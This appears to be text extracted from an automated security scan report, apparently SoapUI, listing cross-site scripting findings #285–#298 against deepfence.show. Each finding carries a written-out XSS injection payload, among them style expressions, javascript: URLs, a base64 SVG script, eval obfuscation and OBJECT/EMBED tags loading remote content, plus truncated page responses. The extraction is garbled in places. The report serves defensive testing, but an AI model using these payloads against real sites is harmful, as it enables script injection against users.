href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #285\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #286\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <XSS STYLE=\"xss:expression(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #287\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:&#101;x&#x2F;*XSS\n*//*/*/pression(alert(\"XSS\"))'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #288\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #289\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\")\n;}</STYLE><A CLASS=XSS></A>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #290\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE type=\"text/css\">BODY{background:url(\"javascript:\nalert('XSS')\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the responseCWE-ID CWE-79\nIssue Number #291\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #292\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BASE HREF=\"javascript:alert('XSS');//\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #293\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://soapui.org/\nscriptlet.html\"></OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #294\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-\n0080c744f389><param name=url value=javascript:alert('XSS')>\n</OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #295\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <EMBED SRC=\"http://soapui.org/xss.swf\" AllowScriptAccess\n=\"always\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #296\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH \nA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv \nMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs \naW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\nIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh \nTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"\nalways\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head\n/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window._\n_DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk \nWidget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/\nekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End \nof Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" \ntype=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZ\nVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIk\niLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints on \nyour systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be echoed back DemoUser1# \nin the response\nCWE-ID CWE-79\nIssue Number #297\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# a=\"get\";b=\"URL(\\\"\";c=\"javascript:\";d=\"alert('XSS');\\\")\";eval(a+\nb+c+d);\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #298\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]] ><![CDATA[\ncript:alert('XSS');\">]] ></C></X></xml><SPAN DATASRC=#I \nDATAFLD=C DATAFORMATAS=HTML></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html 